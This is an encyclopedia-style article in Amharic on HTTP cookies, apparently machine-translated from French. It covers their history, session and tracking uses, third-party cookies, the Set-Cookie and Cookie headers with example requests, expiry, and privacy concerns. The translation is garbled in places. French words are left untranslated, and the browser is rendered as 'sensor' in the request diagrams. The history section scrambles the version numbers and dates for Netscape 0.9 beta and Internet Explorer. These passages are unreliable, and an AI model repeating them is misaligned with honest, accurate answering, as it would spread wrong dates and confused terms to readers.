ግምገማዎች አርታኢዎች
Un ኩኪ ወይም የድር ኩኪ (ወይም ኩኪ፣ አሕጽሮተ ቃል ምስክር በኩቤክ) በኤችቲቲፒ ኮሙኒኬሽን ፕሮቶኮል በኤችቲቲፒ አገልጋይ ወደ ኤችቲቲፒ ደንበኛ የተላከ የመረጃ ቅደም ተከተል ሆኖ ይገለጻል፣ ይህ ደግሞ በተወሰኑ ሁኔታዎች ውስጥ ተመሳሳዩ HTTP አገልጋይ በተጠየቀ ቁጥር ይመለሳል።
ኩኪው ከኤ ጋር እኩል ነው። በተርሚናል ላይ የተከማቸ ትንሽ የጽሑፍ ፋይል የበይነመረብ ተጠቃሚ. ከ20 ዓመታት በላይ ያሉት፣ አሰሳቸውን ለማመቻቸት እና የተወሰኑ ተግባራትን ለመፍቀድ የድር ጣቢያ ገንቢዎች የተጠቃሚ ውሂብ እንዲያከማቹ ያስችላቸዋል። ኩኪዎች በሶስተኛ ወገኖች ሊበዘበዙ የሚችሉ ቀሪ የግል መረጃዎችን ስለያዙ ሁልጊዜ ብዙ ወይም ያነሰ አከራካሪ ናቸው።
እንደ HTTP ራስጌ በድር አገልጋይ ወደ ድር አሳሽ ይላካል ይህም አገልጋዩን በደረሰ ቁጥር ሳይለወጥ ይመልሳል። ኩኪን መጠቀም ይቻላል አንድ ማረጋገጫ, አንድ ክፍለ ጊዜ (የግዛት ጥገና), እና ለ ስለ ተጠቃሚው የተወሰነ መረጃ ያከማቹእንደ የጣቢያ ምርጫዎች ወይም የኤሌክትሮኒክስ የግዢ ጋሪ ይዘቶች። ኩኪ የሚለው ቃል የመጣው ከ አስማት ኩኪ, በ UNIX ኮምፒዩቲንግ ውስጥ በጣም የታወቀ ጽንሰ-ሐሳብ, የአሳሽ ኩኪዎችን ሀሳብ እና ስም ያነሳሳ. ከኩኪዎች ጥቂት አማራጮች አሉ, እያንዳንዳቸው የራሳቸው ጥቅም, ጥቅሞች እና ጉዳቶች አሏቸው.
ቀላል የጽሑፍ ፋይሎች ስለሆኑ ኩኪዎች ሊተገበሩ አይችሉም። እነሱ አይደሉም ስፓይዌርም ሆነ ቫይረሶች አይደሉምምንም እንኳን የአንዳንድ ድረ-ገጾች ኩኪዎች ተጠቃሚዎች ብዙ ድረ-ገጾችን ሲጎበኙ ክትትል እንዲደረግባቸው ስለሚፈቅዱ በብዙ ጸረ-ቫይረስ ሶፍትዌሮች ቢገኙም።
አብዛኛዎቹ ዘመናዊ አሳሾች ተጠቃሚዎችን ይፈቅዳሉ ኩኪዎችን ለመቀበል ወይም ላለመቀበል ይወስኑ. ተጠቃሚዎችም ይችላሉ። ኩኪዎች ለምን ያህል ጊዜ እንደሚቀመጡ ይምረጡ. ሆኖም፣ ኩኪዎችን ሙሉ በሙሉ አለመቀበል አንዳንድ ጣቢያዎችን ከጥቅም ውጭ ያደርጋቸዋል። ለምሳሌ፣ የገቢያ ጋሪዎችን ወይም ምስክርነቶችን (የተጠቃሚ ስም እና የይለፍ ቃል) በመጠቀም መግባት የሚያስፈልጋቸው ጣቢያዎችን ያከማቹ።
ማውጫ
Historique
ቃሉ ኩኪ ከእንግሊዝኛው ቃል የተገኘ ነው። አስማት ኩኪ, ይህም አንድ ፕሮግራም ተቀብሎ ሳይለወጥ የሚመለስ የውሂብ ጥቅል ነው. ኩኪዎች ቀደም ሲል በአይቲ ውስጥ ጥቅም ላይ ውለው ነበር። ሉ ሞንቱሊ በድር ግንኙነት ውስጥ እነሱን ለመጠቀም ሀሳብ ነበረው በጁን 1994. በዚያን ጊዜ ለደንበኛው የኢ-ኮሜርስ ማመልከቻ ባዘጋጀው በኔትስኬፕ ኮሙኒኬሽን ተቀጥሮ ነበር። ኩኪዎች የመደብር ምናባዊ የግዢ ጋሪ ትግበራ አስተማማኝነት ለችግሩ መፍትሄ ሰጥተዋል።
ጆን Giannandrea እና Lou Montulli በዚያው ዓመት የ Netscapeን የመጀመሪያ ኩኪ መግለጫ ጽፈዋል። የMosaic Netscape ስሪት 0.9 ቤታ፣ በጥቅምት 13፣ 1994 የተለቀቀ፣ የተዋሃደ የኩኪ ቴክኖሎጂ (ልጥፍ ተመልከት). የመጀመሪያው (የሙከራ ያልሆነ) የኩኪዎች አጠቃቀም የNetscape ድረ-ገጽ ጎብኚዎች ከዚህ ቀደም ጣቢያውን ጎብኝተው እንደነበሩ ለማወቅ ነው። ሞንቱሊ እ.ኤ.አ. በ1995 ለኩኪ ቴክኖሎጂ የፓተንት ማመልከቻ አስገብቷል እና የአሜሪካ የፓተንት 5774670 ተሰጥቷል። በ 1998 ተሰጥቷል.
እ.ኤ.አ. በ0.9 በ Netscape 1994 beta ውስጥ ከተተገበረ በኋላ ኩኪዎች በጥቅምት 2 በተለቀቀው ኢንተርኔት ኤክስፕሎረር 1995 ውስጥ ተዋህደዋል።
የኩኪዎችን ማስተዋወቅ ገና በሕዝብ ዘንድ በሰፊው አልታወቀም. በተለይም ኩኪዎች በነባሪነት በአሳሽ ቅንጅቶች ውስጥ ተቀባይነት አግኝተዋል, እና ተጠቃሚዎች ስለመገኘታቸው አልተነገራቸውም. አንዳንድ ሰዎች እ.ኤ.አ. በ1995 የመጀመሪያ ሩብ አካባቢ ኩኪዎች መኖራቸውን ያውቁ ነበር ፣ ግን አጠቃላይ ህዝብ ወደ ሕልውናቸው የገባው ፋይናንሺያል ታይምስ የካቲት 12 ቀን 1996 አንድ ጽሑፍ ካተመ በኋላ ብቻ ነው። በዚያው ዓመት ውስጥ ኩኪዎች ብዙ የሚዲያ ትኩረት አግኝተዋል። በሚቻል የግላዊነት ጣልቃ ገብነት ምክንያት። በ1996 እና በ1997 የአሜሪካ ፌዴራላዊ ንግድ ኮሚሽን በሁለት ምክክር የኩኪዎች ጉዳይ ተብራርቷል።
ይፋዊው የኩኪ ዝርዝር ልማት አስቀድሞ በመካሄድ ላይ ነበር። ኦፊሴላዊ መግለጫው የመጀመሪያዎቹ ውይይቶች በኤፕሪል 1995 በ www-talk የመልእክት መላኪያ ዝርዝር ላይ ተካሂደዋል። ልዩ የአይኢቲኤፍ የስራ ቡድን ተፈጠረ። ሁኔታን ከኤችቲቲፒ ግብይቶች ጋር ለማስተዋወቅ ሁለት አማራጭ ሀሳቦች በብሪያን ቤሄለንዶርፍ እና በዴቪድ ክሪስቶል እንደቅደም ተከተላቸው ቀርበዋል ነገር ግን ቡድኑ በራሱ በክርስቶስ መሪነት የ Netscapeን ዝርዝር መግለጫ እንደ መነሻ ለመጠቀም ወስኗል። በፌብሩዋሪ 1996 የስራ ቡድኑ የሶስተኛ ወገን ኩኪዎች ለግላዊነት ትልቅ ስጋት መሆናቸውን ወስኗል። በቡድኑ የተዘጋጀው ዝርዝር መግለጫ በመጨረሻ እንደ ታትሟል RFC 2109.
ከ 2014 መጨረሻ ጀምሮ በብዙ ጣቢያዎች ላይ ስለ ኩኪዎች ባነር እናያለን። የሚፈቅድ ቢያንስ አንድ የአሳሽ ቅጥያ አለ። ባነር አልታየም።.
የኩኪዎች ዓይነቶች እና አጠቃቀሞች
የክፍለ ጊዜ አስተዳደር
ኩኪዎች በአሰሳ ጊዜ የተጠቃሚ ውሂብን ለመጠበቅ ጥቅም ላይ ሊውሉ ይችላሉ፣ ግን በተለያዩ ጉብኝቶችም ጭምር። ኩኪዎች የገቡት የኤሌክትሮኒክስ መገበያያ ጋሪዎችን መተግበርያ ዘዴ ሲሆን ተጠቃሚው ገፁን እያሰሰ መግዛት የሚፈልጋቸውን እቃዎች የሚያከማችበት ምናባዊ መሳሪያ ነው።
በአሁኑ ጊዜ፣ እንደ የግዢ ጋሪዎች ያሉ መተግበሪያዎች የንጥሎቹን ዝርዝር በዳታቤዝ ውስጥ በአገልጋዩ ላይ ያከማቻሉ፣ ይህም ይመረጣል። በኩኪው ውስጥ ከማስቀመጥ ይልቅ. የድር አገልጋዩ ልዩ የክፍለ ጊዜ መታወቂያ የያዘ ኩኪ ይልካል። ከዚያም የድር አሳሹ ይህንን የክፍለ ጊዜ መታወቂያ በእያንዳንዱ ቀጣይ ጥያቄ ይመልሳል እና በቅርጫቱ ውስጥ ያሉት እቃዎች ይቀመጣሉ እና ከዚህ ልዩ የክፍለ ጊዜ መታወቂያ ጋር የተቆራኙ ናቸው።
በተደጋጋሚ ኩኪዎችን መጠቀም ምስክርነቶችን በመጠቀም ወደ ጣቢያ ለመግባት ይጠቅማል። ባጭሩ የድር አገልጋዩ መጀመሪያ ልዩ የሆነ የክፍለ ጊዜ መታወቂያ የያዘ ኩኪ ይልካል። ከዚያ ተጠቃሚዎች ምስክርነታቸውን (ብዙውን ጊዜ የተጠቃሚ ስም እና የይለፍ ቃል) ያቀርባሉ። የድር አፕሊኬሽኑ ክፍለ ጊዜውን ያረጋግጣል እና ተጠቃሚው አገልግሎቱን እንዲደርስ ያስችለዋል።
ለግል
ለወደፊቱ ተገቢውን ይዘት ለማሳየት ኩኪዎች ስለ አንድ ጣቢያ ተጠቃሚ መረጃን ለማስታወስ ሊያገለግሉ ይችላሉ። ለምሳሌ፣ የድር አገልጋይ ወደዚያ ድህረ ገጽ ለመግባት የመጨረሻውን የተጠቃሚ ስም የያዘ ኩኪ መላክ ይችላል፣ በዚህም የተጠቃሚ ስም ወደፊት በሚጎበኝበት ጊዜ አስቀድሞ እንዲሞላ።
ብዙ ድር ጣቢያዎች በተጠቃሚ ምርጫዎች መሰረት ኩኪዎችን ለግል ማበጀት ይጠቀማሉ። ተጠቃሚዎች ምርጫቸውን በቅጽ መርጠው ለአገልጋዩ ያስገቡ። አገልጋዩ ምርጫዎቹን በኩኪ ውስጥ ያስቀምጣቸዋል እና ወደ አሳሹ ይልካል። በመቀጠል ተጠቃሚው የዚህን ጣቢያ ገጽ በደረሰ ቁጥር አሳሹ ኩኪውን ይመልሳል እና ስለዚህ የምርጫዎች ዝርዝር; አገልጋዩ በተጠቃሚው ምርጫ መሰረት ገጹን ማበጀት ይችላል። ለምሳሌ የዊኪፔዲያ ድረ-ገጽ ተጠቃሚዎቹ የመረጡትን የጣቢያ ቆዳ እንዲመርጡ ያስችላቸዋል። የጎግል መፈለጊያ ሞተር ተጠቃሚዎቹ (ያልተመዘገቡም ቢሆኑ) በእያንዳንዱ የውጤት ገጽ ላይ ማየት የሚፈልጉትን የውጤት ብዛት እንዲመርጡ ያስችላቸዋል።
መከታተል
የክትትል ኩኪዎች የበይነመረብ ተጠቃሚዎችን የአሰሳ ልምዶች ለመከታተል ያገለግላሉ። ይህ ደግሞ በከፊል የኮምፒዩተሩን አይ ፒ አድራሻ በመጠቀም የአንድ ገጽ ጥያቄ በማቅረብ ወይም ደንበኛው ከሚልከው ‹ማጣቀሻ› ኤችቲቲፒ አርዕስትን በመጠቀም ፣ነገር ግን ኩኪዎች የበለጠ ትክክለኛነትን ይፈቅዳል። ይህ በሚከተለው ምሳሌ ውስጥ ሊከናወን ይችላል-
- ተጠቃሚው በአንድ ጣቢያ ላይ አንድ ገጽ ከጠራ እና ጥያቄው ኩኪ ከሌለው አገልጋዩ ይህ በተጠቃሚው የጎበኘው የመጀመሪያ ገጽ እንደሆነ ያስባል። ከዚያም አገልጋዩ የዘፈቀደ ሕብረቁምፊ ይፈጥራል እና ከተጠየቀው ገጽ ጋር ወደ አሳሹ ይልካል.
- ከዚህ ቅጽበት ጀምሮ፣ የገጹ አዲስ ገጽ በተጠራ ቁጥር ኩኪው በራስ-ሰር በአሳሹ ይላካል። አገልጋዩ እንደተለመደው ገጹን ይልካል፣ ነገር ግን የተጠራውን ገጽ ዩአርኤል፣ ቀን፣ የጥያቄ ጊዜ እና ኩኪውን በምዝግብ ማስታወሻ ፋይል ውስጥ ይመዘግባል።
የመዝገብ ፋይሉን በመመልከት ተጠቃሚው የትኞቹን ገጾች እንደጎበኘ እና በምን ቅደም ተከተል ማየት ይቻላል. ለምሳሌ፣ ፋይሉ id=abc ኩኪን በመጠቀም ጥቂት ጥያቄዎችን ከያዘ፣ ይሄ ሁሉም ጥያቄዎች ከአንድ ተጠቃሚ የመጡ መሆናቸውን ሊያረጋግጥ ይችላል። የተጠየቀው ዩአርኤል፣ ከጥያቄዎቹ ጋር የተገናኘው ቀን እና ሰዓት የተጠቃሚውን አሰሳ መከታተል ያስችላል።
የሶስተኛ ወገን ኩኪዎች እና የድር ቢኮኖች ከዚህ በታች ተብራርተዋል በተጨማሪም በተለያዩ ድረ-ገጾች ላይ መከታተልን ያነቃሉ። ነጠላ ጣቢያን መከታተል በአጠቃላይ ለስታቲስቲክስ ዓላማዎች ጥቅም ላይ ይውላል። በአንፃሩ የሶስተኛ ወገን ኩኪዎችን በመጠቀም በተለያዩ ድረ-ገጾች ላይ መከታተል በአጠቃላይ የማስታወቂያ ኩባንያዎች ማንነታቸው ያልታወቁ የተጠቃሚ መገለጫዎችን ለማምረት ይጠቅማል (ከዚያም የትኞቹ ማስታወቂያዎች ለተጠቃሚው መታየት እንዳለባቸው ለመወሰን እና ከእነዚህ ማስታወቂያዎች ጋር የሚዛመዱ ኢሜሎችን ለመላክ ይጠቅማሉ - SPAM) ).
ኩኪዎችን መከታተል የተጠቃሚን ግላዊነት የመወረር አደጋ ነው ነገር ግን በቀላሉ ሊሰረዙ ይችላሉ። አብዛኛዎቹ ዘመናዊ አሳሾች አፕሊኬሽኑን ሲዘጉ ቋሚ ኩኪዎችን በራስ ሰር የመሰረዝ አማራጭን ያካትታሉ።
የሶስተኛ ወገን ኩኪዎች
በድረ-ገጹ ውስጥ የተካተቱ ምስሎች እና ሌሎች ነገሮች ገጹን ከሚያስተናግዱ በተለየ አገልጋዮች ላይ ሊኖሩ ይችላሉ። ገጹን ለማሳየት አሳሹ እነዚህን ሁሉ ነገሮች ያወርዳል። አብዛኞቹ ድረ-ገጾች ከተለያዩ ምንጮች የተገኙ መረጃዎችን ይይዛሉ። ለምሳሌ www.example.comን ወደ አሳሽህ ብትተይብ ብዙ ጊዜ በገጹ ላይ ከተለያዩ ምንጮች ማለትም ከwww.example.com የተለየ ጎራ የሚመጡ ነገሮች ወይም ማስታወቂያዎች ይኖራሉ። "የመጀመሪያ" ፓርቲ ኩኪዎች በአሳሹ የአድራሻ አሞሌ ውስጥ በተዘረዘረው ጎራ የተዘጋጁ ኩኪዎች ናቸው። የሶስተኛ ወገን ኩኪዎች የሚዘጋጁት ከተለየ ጎራ በመጡ ነገሮች በአንዱ ነው።
በነባሪ፣ እንደ ሞዚላ ፋየርፎክስ፣ ማይክሮሶፍት ኢንተርኔት ኤክስፕሎረር እና ኦፔራ ያሉ አሳሾች የሶስተኛ ወገን ኩኪዎችን ይቀበላሉ፣ ነገር ግን ተጠቃሚዎች እነሱን ለማገድ በአሳሽ አማራጮች ውስጥ ቅንብሮችን መለወጥ ይችላሉ። የሶስተኛ ወገን ኩኪዎች የድር ተግባርን የሚያነቃቁ ምንም አይነት የደህንነት ስጋት የለም ነገር ግን ተጠቃሚዎችን ለመከታተል ያገለግላሉ። ከጣቢያ ወደ ጣቢያ.
ጎግል ክሮምን ጨምሮ ለሁሉም አሳሾች የሚገኙ እንደ Ghostery ያሉ መሳሪያዎች በሶስተኛ ወገኖች መካከል የሚደረገውን ልውውጥ ማገድ ይችላሉ።
መተግበር
ኩኪዎች በድር አገልጋዩ ወደ አሳሹ የሚላኩ ትናንሽ መረጃዎች ናቸው። አሳሹ ሳይለወጡ ወደ አገልጋዩ ይመልሳቸዋል፣ ይህም ሁኔታን (ያለፉትን ክስተቶች ትውስታ) ወደ ሌላ ሀገር አልባ የኤችቲቲፒ ግብይት ያስተዋውቃል። ያለ ኩኪዎች፣ እያንዳንዱ የድረ-ገጽ ወይም የድረ-ገጽ አካል መልሶ ማግኘት ለተመሳሳዩ ጣቢያ ከሚቀርቡ ሌሎች ጥያቄዎች ነፃ የሆነ ገለልተኛ ክስተት ነው። በድር አገልጋይ ማዘጋጀት ከመቻል በተጨማሪ ኩኪዎችን በአሳሹ ከተደገፉ እና ከተፈቀደላቸው እንደ ጃቫ ስክሪፕት ባሉ ቋንቋዎች ስክሪፕት ማድረግ ይችላሉ።
ይፋዊው የኩኪ መግለጫ አሳሾች በትንሹ የኩኪዎችን ብዛት ማስቀመጥ እና እንደገና መላክ እንደሚችሉ ይጠቁማል። በተለይ፣ አንድ አሳሽ እያንዳንዳቸው አራት ኪሎባይት ያላቸው ቢያንስ 300 ኩኪዎችን፣ እና ለአንድ አገልጋይ ወይም ጎራ ቢያንስ 20 ኩኪዎችን ማከማቸት መቻል አለበት።
በአንቀጽ 3.1 መሠረት RFC 2965፣ የኩኪ ስሞች ለጉዳይ የማይረዱ ናቸው።
ኩኪው የሚያበቃበትን ቀን ሊገልጽ ይችላል፣ በዚህ ጊዜ ኩኪው በዚህ ቀን ይሰረዛል። ኩኪው የሚያበቃበትን ቀን ካልገለጸ ተጠቃሚው ከአሳሹ እንደወጣ ኩኪው ይሰረዛል። ስለዚህ የማለቂያ ቀንን መግለጽ ኩኪው በበርካታ ክፍለ ጊዜዎች እንዲተርፍ የሚያስችል መንገድ ነው። በዚህ ምክንያት, ጊዜው የሚያበቃበት ቀን ያላቸው ኩኪዎች ይባላሉ ጠንካራ. አንድ ምሳሌ መተግበሪያ፡ የችርቻሮ ጣቢያ ተጠቃሚዎች በግዢ ጋሪያቸው ውስጥ ያስቀመጧቸውን እቃዎች ለመመዝገብ የማያቋርጥ ኩኪዎችን ሊጠቀም ይችላል (በእውነቱ፣ ኩኪው በሽያጭ ቦታ ላይ ባለው የውሂብ ጎታ ውስጥ የተቀመጠውን ግቤት ሊያመለክት ይችላል እንጂ በኮምፒውተርዎ ውስጥ አይደለም) . በዚህ መንገድ ተጠቃሚዎች ግዢ ሳይፈጽሙ አሳሹን ትተው ወደ እሱ ከተመለሱ በጋሪው ውስጥ ያሉትን እቃዎች እንደገና ማግኘት ይችላሉ. እነዚህ ኩኪዎች የማለቂያ ቀን ካልሰጡ፣ አሳሹ ሲዘጋ ጊዜው ያበቃል፣ እና በቅርጫቱ ውስጥ ያለው መረጃ ይጠፋል።
ኩኪዎችን በፈጠረው አገልጋይ ላይ ለተወሰነ ጎራ፣ ንዑስ ጎራ ወይም ዱካ ወሰን ሊገደብ ይችላል።
ኩኪ መፍጠር
የድረ-ገጾች ማስተላለፍ የሚከናወነው HyperText Transfer Protocol (HTTP) በመጠቀም ነው። ኩኪዎችን ችላ በማለት አሳሾች በአጠቃላይ አጭር ጽሁፍ በመላክ ከድር አገልጋዮች ገጽ ይደውሉ የኤችቲቲፒ ጥያቄ. ለምሳሌ፣ www.example.org/index.html ገጹን ለመድረስ አሳሾች ከአገልጋዩ www.example.org ጋር ይገናኛሉ እና ይህን የሚመስል ጥያቄ ይልካሉ።
| GET /index.html HTTP/1.1 አስተናጋጅ፡ www.example.org | ||
| ዳሳሽ | → | አገልጋይ |
አገልጋዩ የተጠየቀውን ገጽ በመላክ ይመልሳል፣ በተመሳሳይ ጽሑፍ ቀደም ብሎ፣ ሙሉው እየተጠራ ነው። የኤችቲቲፒ ምላሽ. ይህ ፓኬት አሳሹ ኩኪዎችን እንዲያከማች የሚጠቁሙ መስመሮችን ሊይዝ ይችላል።
| HTTP/1.1 200 OKContent-type፡ text/htmlየኩኪ አዘጋጅ፡ ስም=እሴት (ኤችቲኤምኤል ገጽ) | ||
| ዳሳሽ | ← | አገልጋይ |
አገልጋዩ ማሰሻውን ኩኪ እንዲያከማች ከፈለገ አገልጋዩ የSet-Cookie መስመርን ብቻ ይልካል። Set-Cookie አሳሹ ስም=የዋጋ ሕብረቁምፊን እንዲያከማች እና ወደፊት በሚቀርቡት ሁሉም ጥያቄዎች ወደ አገልጋዩ እንዲመልስ የሚቀርብ ጥያቄ ነው። አሳሹ ኩኪዎችን የሚደግፍ ከሆነ እና ኩኪዎች በአሳሹ አማራጮች ውስጥ የነቁ ከሆነ፣ ኩኪው ለተመሳሳይ አገልጋይ በሚቀርቡት ሁሉም ጥያቄዎች ውስጥ ይካተታል። ለምሳሌ፣ አሳሹ የሚከተለውን ጥያቄ ወደ አገልጋዩ www.example.org በመላክ ገጹን www.example.org/news.html ይደውላል፡-
| GET /news.html HTTP/1.1 አስተናጋጅ፡ www.example.orgኩኪ፡ ስም=እሴት ተቀበል፡*/* | ||
| ዳሳሽ | → | አገልጋይ |
ይህ ከተመሳሳይ አገልጋይ የሌላ ገጽ ጥያቄ ነው፣ እና ከላይ ካለው የመጀመሪያው የሚለየው አገልጋዩ ከዚህ ቀደም ወደ አሳሹ የላከውን ሕብረቁምፊ ስላለው ነው። ለዚህም ምስጋና ይግባውና አገልጋዩ ይህ ጥያቄ ከቀዳሚው ጋር የተገናኘ መሆኑን ያውቃል። አገልጋዩ የተጠራውን ገጽ በመላክ እና እንዲሁም ሌሎች ኩኪዎችን ወደ እሱ በማከል ምላሽ ይሰጣል።
የኩኪውን ዋጋ አዲስ መስመር በመላክ በአገልጋዩ ሊቀየር ይችላል አዘጋጅ-ኩኪ፡ name=new_value ለተጠራው ገጽ ምላሽ። ከዚያ አሳሹ የድሮውን እሴት በአዲስ ይተካዋል።
የSet-Cookie መስመር ብዙውን ጊዜ የሚፈጠረው በCGI ፕሮግራም ወይም በሌላ የስክሪፕት ቋንቋ እንጂ በኤችቲቲፒ አገልጋይ አይደለም። የኤችቲቲፒ አገልጋይ (ለምሳሌ Apache) የፕሮግራሙን ውጤት ብቻ (ከራስጌው በፊት ኩኪዎችን የያዘ ሰነድ) ወደ አሳሹ ያስተላልፋል።
ኩኪዎችን በጃቫ ስክሪፕት ወይም በአሳሹ ውስጥ በሚሰሩ ሌሎች ተመሳሳይ ቋንቋዎች ማለትም ከአገልጋዩ ጎን ይልቅ በደንበኛው በኩል ሊዘጋጁ ይችላሉ። በጃቫ ስክሪፕት የሰነድ.ኩኪ ነገር ለዚህ አላማ ጥቅም ላይ ይውላል። ለምሳሌ, መግለጫ ሰነድ.cookie = "ሙቀት=20" "ሙቀት" የሚባል ኩኪ ይፈጥራል እና ዋጋ 20 ነው.
የኩኪ ባህሪያት
ከስም/እሴት ጥንድ በተጨማሪ ኩኪው የማለቂያ ቀን፣ ዱካ፣ የጎራ ስም እና የታሰበ የግንኙነት አይነት ማለትም መደበኛ ወይም የተመሰጠረ ሊይዝ ይችላል። RFC 2965 ኩኪዎች የግዴታ ስሪት ቁጥር ሊኖራቸው እንደሚገባ ይገልጻል፣ ነገር ግን ይህ በአጠቃላይ ተትቷል። እነዚህ የውሂብ ክፍሎች ስም=አዲስ_ዋጋ ጥንድን ይከተላሉ እና በሴሚኮሎን ይለያያሉ። ለምሳሌ፡- ኩኪን አዘጋጅ-ኩኪ መስመር በመላክ በአገልጋዩ ኩኪ ሊፈጠር ይችላል፡ name=new_value; ጊዜው የሚያበቃበት = ቀን; መንገድ=/; domain=.example.org
የኩኪው ማብቂያ ጊዜ
ኩኪዎች ጊዜው ያልፍባቸዋል እና በአሳሹ ወደ አገልጋዩ በሚከተሉት ሁኔታዎች አይላኩም።
- አሳሹ ሲዘጋ, ኩኪው የማይቋረጥ ከሆነ.
- የኩኪው ማብቂያ ጊዜ ካለፈ.
- የኩኪው ማብቂያ ጊዜ (በአገልጋዩ ወይም በስክሪፕቱ) ወደ ያለፈው ቀን ሲቀየር።
- አሳሹ በተጠቃሚው ጥያቄ ኩኪውን ሲሰርዝ።
ሶስተኛው ሁኔታ ሰርቨሮች ወይም ስክሪፕቶች ኩኪን በግልፅ እንዲሰርዙ ያስችላቸዋል። በጉግል ክሮም ድር አሳሽ የይዘት ቅንጅቶችን በመድረስ የአንድ የተወሰነ ኩኪ የሚያበቃበትን ቀን ማወቅ እንደሚቻል ልብ ይበሉ። በኮምፒዩተር ላይ የተቀመጠ ኩኪ ለመሰረዝ ምንም አይነት አሰራር ካልተወሰደ ለብዙ አስርት አመታት እዚያ ሊቆይ ይችላል።
የተቀበሉ ሀሳቦች።
በይነመረብ ላይ ከመግቢያቸው ጀምሮ ስለ ኩኪዎች ብዙ ሀሳቦች በበይነመረብ እና በመገናኛ ብዙሃን ተሰራጭተዋል። እ.ኤ.አ. በ1998 የዩናይትድ ስቴትስ የኢነርጂ ዲፓርትመንት የኮምፒዩተር ክስተት ክትትል ቡድን ሲአይኤሲ የኩኪ ደህንነት ድክመቶች “በመሠረታዊነት የሌሉ” መሆናቸውን ወስኖ “የጉብኝቶችዎ አመጣጥ እና የጎበኟቸውን የድረ-ገጾች ዝርዝር መረጃ” አብራርቷል ። አስቀድሞ በድር አገልጋዮች መዝገብ ውስጥ አለ። እ.ኤ.አ. በ 2005 ጁፒተር ሪሰርች የጥናት ውጤቱን አሳትሟል ፣ በዚህ ጥናት ውስጥ ጉልህ መቶኛ ምላሽ ሰጭዎች የሚከተሉትን መግለጫዎች ግምት ውስጥ ያስገባሉ ።
- ኩኪዎች እንደዚህ ናቸው። ቫይረስየተጠቃሚዎችን ሃርድ ድራይቭ ይጎዳሉ።
- ኩኪዎች ያመነጫሉ ብቅታ.
- ኩኪዎች ለመላክ ያገለግላሉ አይፈለጌ መልዕክት.
- ኩኪዎች ለማስታወቂያ ብቻ ጥቅም ላይ ይውላሉ.
ኩኪዎች ከተጠቃሚው ኮምፒውተር መረጃን ማጥፋትም ሆነ ማንበብ አይችሉም። ሆኖም፣ ኩኪዎች በአንድ የተወሰነ ጣቢያ ወይም የጣቢያ ስብስብ ላይ በተጠቃሚ የሚጎበኟቸውን ድረ-ገጾች ለማግኘት ያስችላሉ። ይህ መረጃ በተጠቃሚ መገለጫ ውስጥ ሊሰበሰብ ይችላል ወይም ለሦስተኛ ወገኖች በድጋሚ ሊሸጥ ይችላል፣ ይህም ከባድ የግላዊነት ጉዳዮችን ይፈጥራል። አንዳንድ መገለጫዎች ስም-አልባ ናቸው ፣በዚህም ፣ ምንም የግል መረጃ አልያዙም ፣ ግን እንደዚህ ያሉ መገለጫዎች እንኳን አጠራጣሪ ሊሆኑ ይችላሉ።
በዚሁ ጥናት መሰረት ብዙ የኢንተርኔት ተጠቃሚዎች ኩኪዎችን እንዴት መሰረዝ እንደሚችሉ አያውቁም። ሰዎች ኩኪዎችን የማያምኑበት አንዱ ምክንያት አንዳንድ ጣቢያዎች የኩኪዎችን ግላዊ መለያ ገጽታ አላግባብ በመጠቀማቸው እና ይህን መረጃ ለሌሎች ምንጮች በማጋራታቸው ነው። ከፍተኛ መጠን ያለው የታለመ ማስታወቂያ እና ያልተጠየቀ ኢሜል፣ አይፈለጌ መልዕክት ነው ተብሎ የሚታሰበው ኩኪዎችን ከመከታተል ከተሰበሰበ መረጃ ነው።
የአሳሽ ቅንብሮች
አብዛኛዎቹ አሳሾች ኩኪዎችን ይደግፋሉ እና ተጠቃሚው እንዲያሰናክላቸው ይፈቅዳሉ። በጣም የተለመዱት አማራጮች የሚከተሉት ናቸው:
- ኩኪዎችን ያለማቋረጥ እንዲቀበሉ ወይም እንዲታገዱ ሙሉ ለሙሉ አንቃ ወይም አሰናክል።
- በአሳሹ የአድራሻ አሞሌ ውስጥ ጃቫስክሪፕት (document.cookie) በማስገባት ተጠቃሚው ንቁ ኩኪዎችን እንዲያይ ይፍቀዱለት። አንዳንድ አሳሾች በአሁኑ ጊዜ በአሳሹ የተከማቹ ኩኪዎችን ማየት እና መሰረዝ ለሚችል ተጠቃሚ የኩኪ አስተዳዳሪን ያካትታሉ።
አብዛኛዎቹ አሳሾች ኩኪዎችን ያካተተ የግል ውሂብ ሙሉ በሙሉ መሰረዝን ይፈቅዳሉ። የኩኪ ፈቃዶችን ለመቆጣጠር ተጨማሪ ሞጁሎችም አሉ።
ግላዊነት እና የሶስተኛ ወገን ኩኪዎች
በዚህ ምናባዊ ምሳሌ አንድ የማስታወቂያ ኩባንያ በሁለት ድረ-ገጾች ላይ ባነር አስቀምጧል። ባነርዎቹን በአገልጋዮቹ ላይ በማስተናገድ እና የሶስተኛ ወገን ኩኪዎችን በመጠቀም የማስታወቂያ ኩባንያው የተጠቃሚውን ዳሰሳ በእነዚህ ሁለት ጣቢያዎች መከታተል ይችላል።
ኩኪዎች ለድር ተጠቃሚዎች ግላዊነት እና ማንነት መደበቅ ጠቃሚ አንድምታ አላቸው። ምንም እንኳን ኩኪዎች የሚመለሱት ወደ ሚያዘጋጀው አገልጋይ ወይም ለተመሳሳይ የበይነመረብ ጎራ ወደሆነ አገልጋይ ብቻ ቢሆንም፣ ድረ-ገጽ ግን በሌሎች ጎራዎች ውስጥ ባሉ አገልጋዮች ላይ የተከማቹ ምስሎችን ወይም ሌሎች አካላትን ሊይዝ ይችላል። የእነዚህ ውጫዊ ክፍሎች በማገገም ወቅት የሚዘጋጁት ኩኪዎች ይባላሉ የሶስተኛ ወገን ኩኪዎች. ይህ ያልተፈለጉ ብቅ-ባይ መስኮቶች ኩኪዎችን ያካትታል.
የማስታወቂያ ኩባንያዎች ተጠቃሚዎችን በሚጎበኙባቸው የተለያዩ ጣቢያዎች ላይ ለመከታተል የሶስተኛ ወገን ኩኪዎችን ይጠቀማሉ። በተለይም የማስታወቂያ ኩባንያ አንድን ተጠቃሚ የማስታወቂያ ምስሎችን ወይም የመከታተያ ፒክሰል ባኖረባቸው ገፆች ሁሉ መከታተል ይችላል። በተጠቃሚው የተጎበኙ ገፆች እውቀት የማስታወቂያ ኩባንያው የተጠቃሚውን የማስታወቂያ ምርጫዎች እንዲያነጣጥር ያስችለዋል።
በተለይ የሶስተኛ ወገን ኩኪዎችን በመጠቀም በተለያዩ ጎራዎች ላይ ክትትል ሲደረግ የተጠቃሚ መገለጫ የመገንባት ችሎታ አንዳንዶች እንደ ግላዊነት ወረራ ይቆጠራሉ። በዚህ ምክንያት፣ አንዳንድ አገሮች የኩኪ ሕግ አላቸው።
